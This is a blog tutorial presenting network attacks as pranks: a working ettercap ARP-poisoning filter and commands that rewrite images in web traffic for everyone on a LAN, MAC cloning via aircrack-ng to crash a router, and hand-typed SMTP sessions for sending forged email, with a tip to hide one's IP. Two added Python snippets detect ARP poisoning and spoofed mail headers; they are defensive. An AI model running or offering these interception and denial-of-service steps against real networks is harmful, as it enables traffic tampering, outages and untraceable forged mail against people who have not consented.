Practical jokes are a lot of fun to pull on friends. Lately, my tutorials have been more, well, how shall I say... malicious, self-serving, etc. Let's take it down a notch and discuss humorous ways to trick/annoy your friends. But of course, this is all in jest. There are a few methods that I find worthwhile, such as the following.

  1. The ability to make all images on the victim's web browser some random image you choose.
  2. Disabling a wireless access point or router
  3. I send your e-mail.

The first method is probably my favorite. The way one does this is by acquiring a LiveCD of your favorite auditor (such as Backtrack, PHLAK, etc.) and booting it up. The program that we will be using (and yes, only one) will be ettercap. Ettercap is a program that uses ARP poisoning (ARP spoofing) to execute tasks, and may easily be expanded by other plugins, such as, in our case, filters. But first, let's get a brief overview of what ARP poisoning is exactly. ARP poisoning, by definition, "is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack)." (Wikipedia) In layman's terms, by spoofing the Address Resolution Protocol (which finds a device's hardware address, aka the MAC address) you can control the end user's packet routing, what happens to the packets, or what have you. In this case, we want to intercept the packets being retrieved by the HTTP client and replace them with our "preferred" packets, if you will.

So let's get to the nitty gritty, fun/interesting part, instant gratification, whatever. As of now, we need to make our filter to help "redirect" all image files downloaded by our unsuspecting client. Now, keep in mind, this will not work on all websites, since some sites compress their content before you actually download it. The filter below also matches only TCP port 80, so pages served over HTTPS are not touched by it. Take the following code and place it in a file called haha.filter.

    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.leetupload.com/files/images/head.gif\" ");
       replace("IMG SRC=", "img src=\"http://www.leetupload.com/files/images/head.gif\" ");
       msg("Filter Executed.\n");
    }

(The preceding filter was taken and slightly altered from Irongeek.com.) Keep in mind, edit the prior script in any manner you please, such as replacing the URL with your image. Now that we have our amazing little filter, let us apply it, shall we? Ettercap cannot load the filter source as written, so we need to compile it into a binary form that ettercap can understand. Go ahead and open up a console as root and make sure that your main ethernet or wireless adapter is enabled. To do so, type: ifconfig, and see if everything appears to be in order before going any further. Next, let's go to the directory where we placed haha.filter. Here are the direct steps for what we need to do after having connected to the network we wish to "mess" with.

  1. etterfilter haha.filter -o haha.ef (This command converts the script into binary)
  2. If we wish to affect all users on the given network, then we will execute the following: ettercap -T -q -F haha.ef -M ARP // // (The // // is the equivalent of doing a search for *.*, where the asterisks denote "any name or group of letters goes here." Think of it as ***.***.***.*** in terms of an IP address, just much neater with // // instead.)
  3. Wait a bit for it to resolve all the IPs located on the network (remember, it's not the best idea to run this command if you are on a large network, such as a campus. It's an even worse idea on a campus, you'll get your ass kicked out for sure, because yes, you are not untouchable...)
  4. If you wish to target a specific individual, you would type: ettercap -T -q -F haha.ef -M ARP /***.***.***.***/ // (The ***.***.***.*** represents precisely what internal IP address you wish to target).
  5. Now, your unsuspecting victim, erm, I mean, "friend" will be viewing the image you decided to filter over all other web page images. I'm sure he/she will love you for it, heh...
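Seen from the defending side, the ARP poisoning used above leaves a visible trace on the victim: the gateway's IP starts resolving to the same MAC as another host on the LAN. The check below is an added example, not part of the original tutorial; it assumes Linux `arp -an` output, and the sample snapshots and addresses are constructed.

```python
import re
from collections import defaultdict

# Matches Linux `arp -an` lines such as:
#   ? (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})")

# Constructed snapshots of one host's ARP cache, before and during poisoning.
BEFORE = """? (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.1.23) at aa:bb:cc:00:00:17 [ether] on wlan0
? (192.168.1.40) at <incomplete> on wlan0"""
DURING = """? (192.168.1.1) at AA:BB:CC:00:00:17 [ether] on wlan0
? (192.168.1.23) at aa:bb:cc:00:00:17 [ether] on wlan0"""

def parse_arp_table(text):
    """Return {ip: mac} from `arp -an` output; <incomplete> entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_poisoning(table, gateway_ip, baseline=None):
    """Flag signs of ARP spoofing in one ARP cache snapshot."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # The gateway sharing a MAC with another host is the classic symptom.
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            findings.append(("gateway-mac-shared", mac, sorted(ips)))
    # A mapping that differs from a known-good baseline is also suspicious.
    for ip, mac in table.items():
        old = (baseline or {}).get(ip)
        if old and old != mac:
            findings.append(("mac-changed", ip, old, mac))
    return findings

if __name__ == "__main__":
    for f in find_poisoning(parse_arp_table(DURING), "192.168.1.1",
                            parse_arp_table(BEFORE)):
        print(f)
```

A static ARP entry for the gateway on the host, or Dynamic ARP Inspection on the switch, keeps the forged mapping from being accepted in the first place.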

On to the next "joke." From recent experience, people do not find this technique to be as much of a laugh as I do; but you know, to each his own. Not even a chuckle, how disappointing is that? Oh well. This can easily be interpreted as being purely malicious, but considering the context of this article, think again, wise guy. We want to disable our friend's WAP/router. This partially ties in with the definition given earlier about what ARP is/does on a network. In the article before, I discussed a bit more about what a MAC address is (no one MAC address being alike, etc.).

Have you ever seen DHCP mess up before? Sometimes, on rare occasions, IP addresses are duplicated, which for obvious reasons creates quite a conflict. Windows for the most part will auto-disconnect if this happens, flush the currently assigned IP, and pull a new one from the supplied DHCP server. Well, this is somewhat similar to what we are going to do with the router/WAP, but a little more severe, and non-self-correcting. Each WAP/router has an assigned MAC address that supposedly is not the same as any other address on the network; having dueling addresses creates conflicts because the network does not know which way to go. What we want to do is pull the MAC address from our WAP/router and duplicate it on our laptop/desktop, thus causing the gateway to crash.

These pieces of equipment for the most part are not too terribly bright, in the sense that they cannot correct themselves. Most end-user routers that you purchase at Best Buy, CompUSA, or any other national retailer are not heavy-duty, high-tech routers, since common "folk" do not require such devices. The majority of routers that are faced with a MAC address identical to their own will usually crash and become inaccessible, thus killing all traffic. Time for the fun. Boot up your auditor CD, and make sure you have the aircrack-ng suite installed (most come with this, or the legacy series of the software).

  1. Pull up a console and make sure you have your wireless device up and running (I will be using wlan0 as my wireless device.) Type ifconfig to see what devices you have enabled. If the one you normally use is down, simply type: ifconfig device_name_here0 up. Then type: iwconfig device_name_here0 mode monitor. This will allow us to pull all packets in.
  2. To be able to see what MAC address the router/WAP we want to mock, type: airodump-ng --ivs --write file_name_here --channel 11 wireless_device_here0
  3. A new window will appear and will show the BSSID (the WAP) and a MAC address that is in the same form as this example MAC address: 00:11:22:33:44:55. Copy it, write it down, whatever.
  4. Close that console window and open a new one in root.
  5. ifconfig device_name_here0 down
  6. ifconfig device_name_here0 hw ether 00:11:22:33:44:55 (Replace the example address with the one you copied.)
  7. ifconfig device_name_here0 up
  8. Now, connect to the WAP that has the same MAC address as yours now. It should keep trying to acquire the address, and eventually fail. If all went well, the WAP should be down, yay!

The final prank for now will be the "I send your e-mail," a play on words on the popular bumper sticker, "I read your e-mail." It's actually a lot easier than you may think. We are going to boot into Windows (yes, ugh, telnet will have to do). Open up the command prompt and type: telnet. The way it works is that you need to be using a free SMTP relay server, meaning it does not mind sending e-mail to other domains. In other cases, if you are sending an e-mail to, oh say, *@gmail.com, then you must connect to gmail.com. Let's get straight to business.

  1. o mail.freesmtpserver.com 25 (Explanation for the code: o = open, address = your SMTP server, or a free relay server, 25 = the official SMTP port, because if you don't specify it, it will default to the telnet port, 23).
  2. You should wait and then get some sort of response such as 220, blah blah. 220 pretty much means accepted, OK. Now type: helo mail.freesmtpserver.com (helo is the SMTP "language" if you will, to state, um, yeah, hi, I am actually trying to start this session with you, "mail.freesmtpserver.com." It should accept your gracious invitation and throw a not so creative helo gesture back at you.)
  3. Let's specify who the e-mail is being sent from. mail from: n00b1@freesmtpserver.com
  4. Recipient follows... rcpt to: ultra_n00b2@someotheraddress.com
  5. Now to create the body, let your imagination go wild- but not too wild... Type: data
  6. Start typing your message.
  7. When done, hit enter, type a period, and hit enter again.
  8. Your message will now have been saved and then sent to ultra_n00b2@someotheraddress.com! Be sure to use privoxy or something along those lines since it is very easy to pull an IP address from the headers of the received e-mail your friend ultra_n00b2 received, and then ultimately trace back to you.
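As the last step notes, the received headers give the sender away. The following added example (not part of the original tutorial) shows what a recipient or mail admin can read from them for a message typed by hand as above. It assumes Postfix-style Received lines; the sample message and its IP addresses are constructed.

```python
import re
from email import message_from_string

# Postfix-style trace line: "from <HELO name> (<rDNS> [<IP>]) by <server>".
# Assumption: other MTAs format Received differently and need their own pattern.
RECEIVED = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]*)\s*\[(?P<ip>[0-9a-fA-F.:]+)\]\)"
    r"\s+by\s+(?P<by>\S+)")

# Constructed sample: the DATA section was typed by hand, so it carried no
# From/Date/Message-ID headers. IPs are from the documentation ranges.
RAW = """\
Return-Path: <n00b1@freesmtpserver.com>
Received: from mail.freesmtpserver.com (mail.freesmtpserver.com [198.51.100.7])
\tby mx.someotheraddress.com with ESMTP id B2; Mon, 1 Jan 2024 10:00:05 +0000
Received: from mail.freesmtpserver.com (unknown [203.0.113.45])
\tby mail.freesmtpserver.com with SMTP id A1; Mon, 1 Jan 2024 10:00:01 +0000

hello from your "friend"
"""

def origin_hop(msg):
    """Parse the earliest Received header (last in the list).

    Only lines added by servers you trust are reliable; anything below
    them could have been typed into DATA by the sender.
    """
    hops = msg.get_all("Received", [])
    m = RECEIVED.search(hops[-1]) if hops else None
    return m.groupdict() if m else None

def spoof_indicators(raw):
    """Return (client_ip, flags) for a raw RFC 5322 message."""
    msg = message_from_string(raw)
    hop = origin_hop(msg)
    flags = [f"missing-{h.lower()}" for h in ("From", "Date", "Message-ID")
             if msg[h] is None]
    # The client introduced itself with the server's own name (step 2 above).
    if hop and hop["helo"].lower() == hop["by"].lower():
        flags.append("helo-claims-server-name")
    if hop and hop["rdns"] == "unknown":
        flags.append("no-reverse-dns")
    return (hop["ip"] if hop else None), flags

if __name__ == "__main__":
    print(spoof_indicators(RAW))
```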

Remember that all of the actions stated prior may of course be used for more malicious purposes, but it relies on you, the user on how you wish to apply these methods. Stay tuned for my next tutorial!